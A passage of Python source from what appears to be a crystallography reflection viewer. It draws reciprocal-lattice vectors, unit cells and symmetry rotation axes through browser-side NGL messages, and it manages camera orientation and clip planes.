self.SendInfoToGUI( { "StatusBar": "RotMx: %s, X: %s, Y: %s, Z: %s" \
%(str(roundoff(self.currentRotmx,4)), str(roundoff(Xhkl, 2)),
str(roundoff(Yhkl, 2)),
str(roundoff(Zhkl, 2))),
}
)
self.draw_vector(0,0,0, Zhkl[0],Zhkl[1],Zhkl[2], isreciprocal=True, label="Zhkl",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
self.draw_vector(0,0,0, Yhkl[0],Yhkl[1],Yhkl[2], isreciprocal=True, label="Yhkl",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
self.draw_vector(0,0,0, Xhkl[0],Xhkl[1],Xhkl[2], isreciprocal=True, label="Xhkl",
name="XYZhkl", r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
else:
self.SendInfoToGUI( { "StatusBar": "X: %s , Y: %s , Z: %s" %(str(roundoff(Xhkl, 2)),
str(roundoff(Yhkl, 2)),
str(roundoff(Zhkl, 2))),
} )
if "MouseMovedOrientation:" in message:
self.params.mouse_moved = True
if self.currentRotmx.is_r3_rotation_matrix():
# Round off matrix elements to avoid machine imprecision errors that might cast
# any matrix element into a number strictly larger than 1 which would
# crash r3_rotation_matrix_as_x_y_z_angles()
self.currentRotmx = matrix.sqr(roundoff(self.currentRotmx.elems, 8) )
angles = self.currentRotmx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
z_vec = flex.vec3_double( [(0,0,1)])
self.rot_zvec = z_vec * self.currentRotmx
self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
self.rot_recip_zvec = self.rot_zvec * rfracmx
self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec=5):
nwait = 0
while not self.WBmessenger.browserisopen:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > sec:
return False
return True
def OpenBrowser(self):
if self.viewerparams.scene_id is not None and not self.WBmessenger.websockclient \
and not self.WBmessenger.browserisopen or self.isnewfile:
with open(self.hklfname, "w") as f:
f.write( self.htmlstr )
self.url = "file:///" + os.path.abspath( self.hklfname )
self.url = self.url.replace("\\", "/")
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
if self.UseOSBrowser=="default":
if not webbrowser.open(self.url, new=0):
self.mprint("Could not open the default web browser")
return False
if self.UseOSBrowser != "default" and self.UseOSBrowser != "":
browserpath = self.UseOSBrowser + " %s"
if not webbrowser.get(browserpath).open(self.url, new=0):
self.mprint("Could not open web browser, %s" %self.UseOSBrowser)
return False
self.SendInfoToGUI({ "html_url": self.url } )
self.WBmessenger.browserisopen = True
#self.isnewfile = False
return True
return False
def set_show_tooltips(self):
msg = "%s" %self.ngl_settings.show_tooltips
self.AddToBrowserMsgQueue("DisplayTooltips", msg)
def set_tooltip_opacity(self):
msg = "%f" %self.ngl_settings.tooltip_alpha
self.AddToBrowserMsgQueue("TooltipOpacity", msg)
def SetOpacities(self, bin_opacities_str):
retstr = ""
if self.miller_array and bin_opacities_str:
self.ngl_settings.bin_opacities = bin_opacities_str
bin_opacitieslst = eval(self.ngl_settings.bin_opacities)
for binopacity in bin_opacitieslst:
alpha = binopacity[0] # float(binopacity.split(",")[0])
bin = binopacity[1] # int(binopacity.split(",")[1])
retstr += self.set_opacity(bin, alpha)
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
self.mprint( retstr, verbose=1)
def set_opacity(self, bin, alpha):
if bin > self.nbinvalsboundaries-1:
return "There are only %d bins present\n" %self.nbinvalsboundaries
msg = "%d, %f" %(bin, alpha)
self.AddToBrowserMsgQueue("alpha", msg)
return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
self.AddToBrowserMsgQueue("Redraw")
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", verbose=1)
if not self.OpenBrowser():
self.AddToBrowserMsgQueue("Reload")
def JavaScriptCleanUp(self, ):
self.AddToBrowserMsgQueue("JavaScriptCleanUp")
def ExpandInBrowser(self):
"""
Expansion of reflections stored in an assymetric unit wedge defined by the spacegroup is
done by applying the rotation matrices defined by the spacegroup on the reflections.
Applying these matrices on all reflections is done much faster in WebGL in the browser.
Before sending the rotation matrices to the browser first convert them into cartesian
coordinates.
"""
if self.sceneisdirty:
self.mprint( "Not expanding in browser", verbose=1)
return
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if self.viewerparams.expand_to_p1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
retmsg = "Expanding to P1 in browser"
if not self.miller_array.is_unique_set_under_symmetry():
retmsg += "\nNot all reflections are in the same asymmetric unit in reciprocal space.\n"
retmsg += "Some reflections might be displayed on top of one another.\n"
self.mprint( retmsg, verbose=1)
else:
unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
if self.viewerparams.expand_anomalous and not self.miller_array.anomalous_flag():
msgtype += "Friedel"
self.mprint( "Expanding Friedel mates in browser", verbose=1)
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n" # add rotation matrix to end of message string
self.AddToBrowserMsgQueue(msgtype, msg)
self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
def draw_sphere(self, s1, s2, s3, isreciprocal=True,
r=0, g=0, b=0, name="", radius = 1.0, mesh=False):
"""
Place sphere at [s1, s2, s3] with colour r,g,b. If name=="", the creation
is deferred until draw_sphere is eventually called with name != "". These
spheres are then joined in the same NGL representation.
"""
uc = self.miller_array.unit_cell()
vec = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
# for floating valued miller indices with the transpose of the fractionalization matrix
vec = list( vec * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec = [ vec[0], vec[1], vec[2] ]
else: # real space fractional values
vec = list( vec * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 1.0/self.scene.renderscale
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec = [ vscale*vec[0], vscale*vec[1], vscale*vec[2] ]
self.draw_cartesian_sphere(svec[0], svec[1], svec[2], r, g, b, name, radius, mesh)
def draw_cartesian_sphere(self, s1, s2, s3, r=0, g=0, b=0, name="", radius = 1.0, mesh=False):
self.mprint("cartesian sphere is at: %s" %(str(roundoff([s1, s2, s3]))), verbose=2)
self.AddToBrowserMsgQueue("DrawSphere", "%s;; %s;; %s;; %s;; %s;; %s;; %s;; %s;; %s" \
%(s1, s2, s3, r, g, b, radius, name, int(mesh)) )
if name=="":
self.mprint("deferred rendering sphere at (%s, %s, %s)" %(s1, s2, s3), verbose=2)
def draw_vector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
r=0, g=0, b=0, name="", radius = 0.15, labelpos=0.8):
"""
Place vector from [s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label
If name=="" creation is deferred until draw_vector is eventually called with name != ""
These vectors are then joined in the same NGL representation
"""
uc = self.miller_array.unit_cell()
vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
# for floating valued miller indices with the transpose of the fractionalization matrix
vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec1 = [ vec1[0], vec1[1], vec1[2] ]
svec2 = [ vec2[0], vec2[1], vec2[2] ]
else: # real space fractional values
vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 1.0/self.scene.renderscale
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
self.draw_cartesian_vector(svec1[0], svec1[1], svec1[2], svec2[0], svec2[1], svec2[2],
label, r, g, b, name, radius, labelpos)
def draw_cartesian_vector(self, s1, s2, s3, t1, t2, t3, label="", r=0, g=0, b=0, name="", radius = 0.15, labelpos=0.8):
self.mprint("cartesian vector is: %s to %s" %(str(roundoff([s1, s2, s3])), str(roundoff([t1, t2, t3]))), verbose=1)
self.AddToBrowserMsgQueue("DrawVector", "%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s" \
%(s1, s2, s3, t1, t2, t3, r, g, b, label, name, radius, labelpos) )
if name=="":
self.mprint("deferred rendering vector from (%s, %s, %s) to (%s, %s, %s)" %(s1, s2, s3, t1, t2, t3), verbose=2)
def get_cartesian_vector_angles(self, s1, s2, s3, t1, t2, t3):
svec = [t1-s1, t2-s2, t3-s3]
xyvec = svec[:] # deep copying
xyvec[2] = 0.0 # projection vector of svec in the xy plane
xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
if xyvecnorm > 0.0:
angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
else:
angle_x_xyvec = 90.0
angle_y_xyvec = 90.0
yzvec = svec[:]
yzvec[0] = 0.0 # projection vector of svec in the yz plane
yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
if yzvecnorm > 0.0:
angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
else:
angle_y_yzvec = 90.0
angle_z_yzvec = 90.0
svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
if angle_y_svec > 90.0:
angle_x_xyvec = -angle_x_xyvec
self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToScreen(self, angle_x_xyvec, angle_z_svec):
rotmx = self.Euler2RotMatrix(( angle_x_xyvec, angle_z_svec + 180.0, 0.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def PointVectorParallelToScreen(self, angle_x_xyvec, angle_z_svec):
rotmx = self.Euler2RotMatrix(( angle_x_xyvec, angle_z_svec + 90.0, 90.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def GetVectorAndAngleFromRotationMx(self, rot):
RotMx = matrix.sqr(rot.as_double())
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
ortrotmx = (OrtMx * RotMx * InvMx)
isProperRotation = True
ortrot = ortrotmx.as_mat3()
label=""
order = 0
if not ortrotmx.is_r3_rotation_matrix():
isProperRotation = False
self.mprint("""Warning! The operation '%s' is not a proper rotation
in the space group %s\nwith unit cell %s\n""" \
%(rot.as_hkl(), self.miller_array.space_group().info().symbol_and_number(), str(uc) ))
self.mprint("Inverse of implied rotation matrix,\n%s\nis not equal to its transpose,\n%s" \
%(str(roundoff(ortrotmx.inverse(),4)), str(roundoff(ortrotmx.transpose(),4))), verbose=1)
improper_vec_angle = scitbx.math.r3_rotation_axis_and_angle_from_matrix(ortrot)
self.mprint("\nTrying to find nearest orthonormal matrix approximtion")
Rmx = matrix.find_nearest_orthonormal_matrix(ortrotmx)
self.mprint("New suggested rotation matrix is\n%s" %str(roundoff(Rmx,4)), verbose=1)
if not Rmx.is_r3_rotation_matrix():
self.mprint("Failed finding an approximate rotation matrix!")
return (0,0,0), 0.0, label, order
ortrotmx = Rmx
ortrot = ortrotmx.as_mat3()
r11,r12,r13,r21,r22,r23,r31,r32,r33 = ortrot
theta = math.acos(roundoff((r11+r22+r33-1.0)*0.5, 10))
rotaxis = flex.vec3_double([(0,0,0)])
self.mprint(str(ortrot), verbose=2)
vec_angle = scitbx.math.r3_rotation_axis_and_angle_from_matrix(ortrot)
rotaxis = flex.vec3_double([ vec_angle.axis ])
if not isProperRotation:
# Divine revelation: The new proper rotation from above axis is halfway
# of being correctly aligned so subtract it from twice the improper axis
# to get the desired rotation axis vector
improp_rotaxis = flex.vec3_double([ improper_vec_angle.axis ])
rotaxis = 2*rotaxis - improp_rotaxis
# for debugging deduce the corresponding rotation matrix from this new axis
usedrotmx = scitbx.math.r3_rotation_axis_and_angle_as_matrix( rotaxis[0], theta )
self.mprint("Final proper rotation matrix:\n%s" %str(roundoff(matrix.sqr(usedrotmx),4)), verbose=1)
## adjust the length of the rotation axes to be compatible with the sphere of reflections
#s = math.sqrt(OrtMx.transpose().norm_sq())*self.realspace_scale
if abs(theta) > 0.0001 and rotaxis.norm() > 0.01: # avoid nullvector
order = int(roundoff(2*math.pi/theta, 0)) # how many times to rotate before its the identity operator
label = "%s-fold" %str(order)
return tuple((rotaxis)[0]), theta, label, order
#return tuple((s*rotaxis)[0]), theta, label, order
def show_rotation_axes(self):
if self.viewerparams.show_symmetry_rotation_axes:
for i, (opnr, label, v, xyzop, hklop) in enumerate( self.rotation_operators ): # skip the last op for javascript drawing purposes
if i < len(self.rotation_operators)-1:
self.draw_cartesian_vector(0, 0, 0, v[0], v[1], v[2], label=label, radius=0.2, labelpos=1.0)
else: # supply name to tell javascript to draw all these vectors
self.draw_cartesian_vector(0, 0, 0, v[0], v[1], v[2], label=label, name="SymRotAxes", radius=0.2, labelpos=1.0)
else:
self.RemovePrimitives("SymRotAxes")
def calc_rotation_axes(self):
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
self.rotation_operators = []
for i,op in enumerate(unique_rot_ops): # skip the last op for javascript drawing purposes
(cartvec, a, label, order) = self.GetVectorAndAngleFromRotationMx( op.r() )
if label != "":
self.mprint( str(i) + ": " + str(roundoff(cartvec)) + ", " + label, verbose=1)
self.rotation_operators.append( (i, label + "#%d"%i, order , cartvec, op.r().as_hkl(), "", "") )
def show_vector(self):
[i, val] = eval(self.viewerparams.show_vector)
self.visual_symmxs = []
if i < len(self.all_vectors):
(opnr, label, order, v, hklop, hkl, abc) = self.all_vectors[i]
# avoid onMessage-DrawVector in HKLJavaScripts.js misinterpreting the commas in strings like "-x,z+y,-y"
name = label + hklop.replace(",", "_")
if val:
self.currentrotvec = v # the vector used for aligning
if order > 0 and hklop != "":
# if this is a rotation operator deduce the group of successive rotation matrices it belongs to
rt = sgtbx.rt_mx(symbol= hklop, r_den=12, t_den=144)
RotMx = matrix.sqr(rt.r().as_double() )
self.visual_symmxs.append( (RotMx, rt.r().as_hkl()) )
nfoldrotmx = RotMx
nfoldrot = rt.r()
for ord in range(order -1): # skip identity operator
nfoldrotmx = RotMx * nfoldrotmx
nfoldrot = nfoldrot.multiply( rt.r() )
self.visual_symmxs.append( (nfoldrotmx, nfoldrot.as_hkl()) )
# adjust the length of the rotation axes to be compatible with the sphere of reflections
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
s = math.sqrt(OrtMx.transpose().norm_sq())*self.realspace_scale
self.currentrotvec = [s*v[0], s*v[1], s*v[2]]
self.draw_cartesian_vector(0, 0, 0, self.currentrotvec[0], self.currentrotvec[1],
self.currentrotvec[2], r=0.1, g=0.1,b=0.1,
label=label, name=name, radius=0.2, labelpos=1.0)
else:
self.RemovePrimitives(name)
self.visual_symmxs = []
self.visual_symHKLs = []
self.RemovePrimitives("sym_HKLs") # delete other symmetry hkls from a previous rotation operator if any
def visualise_sym_HKLs(self):
if len(self.visual_symHKLs):
self.RemovePrimitives("sym_HKLs")
for i,(hkl,hklstr) in enumerate(self.visual_symHKLs):
thkl = tuple(hkl)
hklstr = "H,K,L: %d,%d,%d" %thkl
if i < len(self.visual_symHKLs)-1:
self.draw_vector(0,0,0, hkl[0],hkl[1],hkl[2], isreciprocal=True, label=hklstr, r=0.5, g=0.3, b=0.3,
radius=0.1, labelpos=1.0)
else: # supplying a name for the vector last graphics primitive draws them all
self.draw_vector(0,0,0, hkl[0],hkl[1],hkl[2], isreciprocal=True, label=hklstr, name="sym_HKLs",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
def show_hkl(self, bigwireframe=True):
"""
Draw a wireframe sphere around a reflection selected with a double click in
the millerarraytable in the GUI
"""
rad = self.HKLscene_from_dict(self.radii_scene_id).max_radius*1.5
if not bigwireframe:
rad = self.HKLscene_from_dict(self.radii_scene_id).min_radius*0.9
self.RemovePrimitives("highlight_HKL")
if self.viewerparams.show_hkl != "deselect":
hkl = eval(self.viewerparams.show_hkl)
if self.sg.info().symbol_and_number() == self.miller_array.space_group().info().symbol_and_number():
self.draw_sphere(hkl[0],hkl[1],hkl[2], isreciprocal=True, name="highlight_HKL",
r=1, g=0.0, b=0.0, radius= rad, mesh=True)
else:
self.mprint("Cannot currently associate reflection in original space group with reflection in different space group.")
self.viewerparams.show_hkl = "" # to allow clicking on the same entry in the millerarraytable
def rotate_around_numbered_vector(self):
vecnr, deg = eval(self.params.clip_plane.angle_around_vector)
if vecnr < len(self.all_vectors):
self.rotate_components_around_cartesian_vector(self.all_vectors[vecnr][3], deg)
def rotate_components_around_cartesian_vector(self, cartvec, deg):
phi = cmath.pi*deg/180
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.RotateAxisComponents([ux,uy,uz], phi, True)
def rotate_stage_around_cartesian_vector(self, cartvec, deg):
phi = cmath.pi*deg/180
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.RotateAxisMx([ux,uy,uz], phi, True)
def animate_rotate_around_vector(self):
vecnr, speed = eval(self.params.clip_plane.animate_rotation_around_vector)
if vecnr < len(self.all_vectors):
cartvec = self.all_vectors[vecnr][3]
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
self.AnimateRotateAxisComponents([ux,uy,uz], speed, True)
def DrawUnitCell(self, scale=1):
if scale is None:
self.RemovePrimitives("unitcell")
self.mprint( "Removing real space unit cell", verbose=2)
return
rad = 0.2 # scale # * 0.05 # 1000/ uc.volume()
self.draw_vector(0,0,0, scale,0,0, False, label="a", r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,0, 0,scale,0, False, label="b", r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,0,0, 0,0,scale, False, label="c", r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(scale,0,0, scale,scale,0, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,scale,0, scale,scale,0, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,scale, scale,0,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(0,0,scale, 0,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(0,scale,scale, scale,scale,scale, False, r=0.5, g=0.8, b=0.8, radius=rad)
self.draw_vector(scale,0,scale, scale,scale,scale, False, r=0.8, g=0.5, b=0.8, radius=rad)
self.draw_vector(scale,0,0, scale,0,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(0,scale,0, 0,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad)
self.draw_vector(scale,scale,0, scale,scale,scale, False, r=0.8, g=0.8, b=0.5, radius=rad, name="unitcell")
self.mprint( "Adding real space unit cell", verbose=1)
def DrawReciprocalUnitCell(self, scale=1):
if scale is None:
self.RemovePrimitives("reciprocal_unitcell")
self.mprint( "Removing reciprocal unit cell", verbose=2)
return
rad = 0.2 # 0.05 * scale
self.draw_vector(0,0,0, scale,0,0, label="a*", r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,0, 0,scale,0, label="b*", r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,0,0, 0,0,scale, label="c*", r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(scale,0,0, scale,scale,0, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,scale,0, scale,scale,0, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,scale, scale,0,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(0,0,scale, 0,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(0,scale,scale, scale,scale,scale, r=0.5, g=0.3, b=0.3, radius=rad)
self.draw_vector(scale,0,scale, scale,scale,scale, r=0.3, g=0.5, b=0.3, radius=rad)
self.draw_vector(scale,0,0, scale,0,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(0,scale,0, 0,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad)
self.draw_vector(scale,scale,0, scale,scale,scale, r=0.3, g=0.3, b=0.5, radius=rad, name="reciprocal_unitcell")
self.mprint( "Adding reciprocal unit cell", verbose=1)
def GetUnitcellScales(self):
spanmin, spanmax = ( self.miller_array.index_span().min(), self.miller_array.index_span().max())
uc = self.miller_array.unit_cell()
vec = (1.0, 1.0, 1.0)
# uc.reciprocal_space_vector() only takes integer miller indices so compute
# the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
vec1 = vec * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_bodydiagonal_length = vec1.length()
reciprocspanmaxvec = spanmax * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmax_length = reciprocspanmaxvec.length()
reciprocspanminvec = spanmax * matrix.sqr(uc.fractionalization_matrix()).transpose()
reciproc_spanmin_length = reciprocspanminvec.length()
reciprocspan_length = max(reciproc_spanmax_length, reciproc_spanmin_length)
self.reciproc_scale = reciprocspan_length / reciproc_bodydiagonal_length
# for real space vector
vec2 = vec * matrix.sqr(uc.orthogonalization_matrix())
bodydiagonal_length = vec2.length()
self.realspace_scale = self.scene.renderscale * reciprocspan_length / bodydiagonal_length
def project_vector1_vector2(self, vec1, vec2):
# cartesian projection of vec1 onto vec2
L1 = math.sqrt( vec1[0]*vec1[0] + vec1[1]*vec1[1] + vec1[2]*vec1[2] )
L2 = math.sqrt( vec2[0]*vec2[0] + vec2[1]*vec2[1] + vec2[2]*vec2[2] )
dotproduct = vec1[0]*vec2[0] + vec1[1]*vec2[1] + vec1[2]*vec2[2]
cosine = dotproduct/(L1*L2)
projvec1 = (vec1[0]*cosine, vec1[1]*cosine, vec1[2]*cosine)
projvec2 = (vec2[0]*cosine, vec2[1]*cosine, vec2[2]*cosine)
return cosine, projvec1, projvec2
def orient_vector_to_screen(self, cartvec):
if cartvec is None:
return
angle_x_xyvec, angle_z_svec = self.get_cartesian_vector_angles(0, 0, 0,
cartvec[0],
cartvec[1],
cartvec[2])
cartveclength = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
self.mprint( "cartveclength= %s" %roundoff(cartveclength), verbose=1)
if self.viewerparams.is_parallel:
self.PointVectorParallelToScreen(angle_x_xyvec, angle_z_svec)
else:
self.PointVectorPerpendicularToScreen(angle_x_xyvec, angle_z_svec)
def fix_orientation(self):
if self.viewerparams.fixorientation != "None":
self.DisableMouseRotation()
else:
self.EnableMouseRotation()
def make_clip_plane(self, hkldist=0.0, clipwidth=None):
# create clip plane oriented parallel or perpendicular to abc vector
if clipwidth is None:
self.RemovePrimitives()
self.SetClipPlaneDistances(0, 0)
self.TranslateHKLpoints(0, 0, 0, 0.0)
return
self.mprint("Applying clip plane to reflections", verbose=1)
self.RemovePrimitives("clip_vector")
if self.cameraPosZ is None and self.viewmtrx is not None:
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
halfdist = self.cameraPosZ + hkldist # self.viewer.boundingZ*0.5
if clipwidth == 0.0:
clipwidth = self.meanradius
clipNear = halfdist - clipwidth # 50/self.viewer.boundingZ
clipFar = halfdist + clipwidth #50/self.viewer.boundingZ
self.SetClipPlaneDistances(clipNear, clipFar, -self.cameraPosZ)
self.mprint("clipnear: %s, clipfar: %s, cameraZ: %s" %(clipNear, clipFar, -self.cameraPosZ), verbose=1)
def set_camera_type(self):
self.AddToBrowserMsgQueue("SetCameraType", self.ngl_settings.camera_type)
def get_labels_of_data_for_binning(self):
self.mprint("Data can be binned according to:")
for i,e in enumerate(self.bin_labels_type_idxs):
self.mprint("%d, %s" %(i, e[0]))
def SetFontSize(self, fontsize):
msg = str(fontsize)
self.AddToBrowserMsgQueue("SetFontSize", msg)
def SetBrowserDebug(self, isdebug):
msg = str(isdebug)
self.AddToBrowserMsgQueue("SetBrowserDebug", msg)
def SetMouseSpeed(self, trackspeed):
msg = str(trackspeed)
self.AddToBrowserMsgQueue("SetMouseSpeed", msg)
#self.GetMouseSpeed() # TODO: fix wait time
def GetMouseSpeed(self):
self.ngl_settings.mouse_sensitivity = None
self.mousespeed_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetMouseSpeed", "")
if self.WaitforHandshake():
nwait = 0
if not self.mousespeed_msg_sem.acquire(blocking=False) and nwait < 5:
nwait += self.sleeptime
self.mprint("mousespeed_msg_sem, wait= %s" %nwait, verbose=2)
self.mousespeed_msg_sem.release()
def SetClipPlaneDistances(self, near, far, cameraPosZ=None):
if cameraPosZ is None:
cameraPosZ = self.cameraPosZ
msg = str(near) + ", " + str(far) + ", " + str(cameraPosZ)
self.AddToBrowserMsgQueue("SetClipPlaneDistances", msg)
def GetClipPlaneDistances(self):
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.clipplane_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetClipPlaneDistances", "") #
if self.WaitforHandshake():
nwait = 0
if not self.clipplane_msg_sem.acquire(blocking=False) and nwait < 5:
nwait += self.sleeptime
self.mprint("clipplane_msg_sem, wait= %s" %nwait, verbose=2)
self.mprint("clipnear, clipfar, cameraPosZ: %s, %s %s" \
%(self.clipNear, self.clipFar, self.cameraPosZ), 2)
self.clipplane_msg_sem.release()
return (self.clipNear, self.clipFar, self.cameraPosZ)
def GetBoundingBox(self):
self.boundingX = 0.0
self.boundingY = 0.0
self.boundingZ = 0.0
self.boundingbox_msg_sem.acquire()
self.AddToBrowserMsgQueue("GetBoundingBox", "")
if self.WaitforHandshake():
nwait = 0
if not self.boundingbox_msg_sem.acquire(blocking=False) and nwait < 5:
nwait += self.sleeptime
self.mprint("boundingbox_msg_sem, wait= %s" %nwait, verbose=2)
self.mprint("boundingXYZ: %s, %s %s" \
%(self.boundingX, self.boundingY, self.boundingZ), verbose=2)
self.boundingbox_msg_sem.release()
return (self.boundingX, self.boundingY, self.boundingZ)
def RemovePrimitives(self, reprname=""):
self.AddToBrowserMsgQueue("RemovePrimitives", reprname )
def SetAutoView(self):
rotmx = self.Euler2RotMatrix( ( 0.0, 0.0, 0.0 ) )
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
self.AddToBrowserMsgQueue("SetAutoView" )
def TestNewFunction(self):
self.AddToBrowserMsgQueue("Testing")
def MakeImage(self, filename):
self.imagename = filename
self.AddToBrowserMsgQueue("MakeImage2", "HKLviewer.png,"+ str(sys.version_info[0]) )
def DisableMouseRotation(self): # disable rotating with the mouse
self.AddToBrowserMsgQueue("DisableMouseRotation")
def EnableMouseRotation(self): # enable rotating with the mouse
self.AddToBrowserMsgQueue("EnableMouseRotation")
def ReOrientStage(self):
if self.viewmtrx:
self.AddToBrowserMsgQueue("SetAutoView", self.viewmtrx)
def Euler2RotMatrix(self, eulerangles):
eulerangles1 = eulerangles
radangles = [e*math.pi/180.0 for e in eulerangles1]
# scitbx is using ZYZ convention for euler angles
# https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix
